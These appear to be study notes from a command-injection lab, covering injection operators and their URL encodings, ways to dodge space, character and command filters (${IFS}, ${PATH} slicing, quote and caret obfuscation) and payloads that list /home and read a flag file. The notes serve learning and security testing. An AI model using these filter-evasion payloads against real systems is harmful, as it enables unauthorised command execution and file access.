Command Injection
Exploitation - Detection
Detection is the same methodology and actually exploiting
| Operator | Injection | URL Encoded | command executed |
|---|---|---|---|
| Semicolon | ; | %3b | Both |
| New Line | \n | %0a | Both |
| Background | & | %26 | Both → Second output shown firsdt |
| Pipe | | | %7c | Both → Only second output is shown |
| AND | && | %26%26 | Both but only if first command success |
| OR | || | %7c%7c | Second but only if first fails |
| Sub-Shell | “ | %60%60 | Both → Linux Only |
| Sub-Shell | $() | %24%28%29 | Both → Linux Only |
Exploitation - Injecting Commands
You need more than just the frontend to protect from command injection
Filter Evasion - Identifying Filters
If you get an error back on an output display then its probably the backend code. if you get it in a new page with IP info then it is probably a WAF
Filter Evasion - Bypassing Space Filters
Note: encoding \n is not the same
Tabs can replace spaces - %09 is the url encoding of tab
${IFS} Linux variable
or we can brace expansion {ls,-la} will add a space
useful link https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection#bypass-without-space
Filter Evasion - Bypassing Other Blacklisted Characters
\ and / are commonly filtered out
Replacing blacklisted characters with Linux variables is a good alternative
slashes do not have a variable but we can overcome this with the ${PATH} variable we then can use an array notion to go where we want
example
echo ${PATH}
/usr/local/bin:/usr/bin:/bin:/usr/gamesto get to the root directory we can do the following
echo ${PATH:0:1}this will output the root dir
${LS_COLORS:10:1}This is a way to extract a semicolon. Based on the output I am guessing it goes by characters 10
rs=0:di=01; the semi colon is at the 10 position (Remember 0 is the first place) then the 1 extracts only the first character from there
printenvIs a Linux command that
NOTE: Always test the payload i na terminal first. The reason being you may not be able to ECHO anything out so find where you want to go test on a linux environment first. then alter the injection to give you what you want.
ip=127.0.0.1%0als${IFS}${PATH:0:1}homeFilter Evasion - Bypassing Blacklisted Commands
A common way of obfuscating command is by adding characters Linux or windows generally ignores.
we can use quotes
e'c'h'o'
e"c"h"o"Linux only: backslashes and $@ which is called the positional parameter character
e\c\h\o
ec$@choWindows only: ^
C:\htb> who^amiinjection to get flag
127.0.0.1%0ac"at"${IFS}${PATH:0:1}home${PATH:0:1}1nj3c70r${PATH:0:1}flag.txt